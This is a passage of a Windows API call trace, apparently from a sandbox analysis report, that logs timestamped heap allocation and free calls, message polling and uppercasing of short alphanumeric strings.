(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0207.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.748] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.749] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0207.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0207.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0207.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0207.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0207.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0207.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.751] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0207.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0207.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0207.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.756] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.756] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.756] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.756] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.756] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 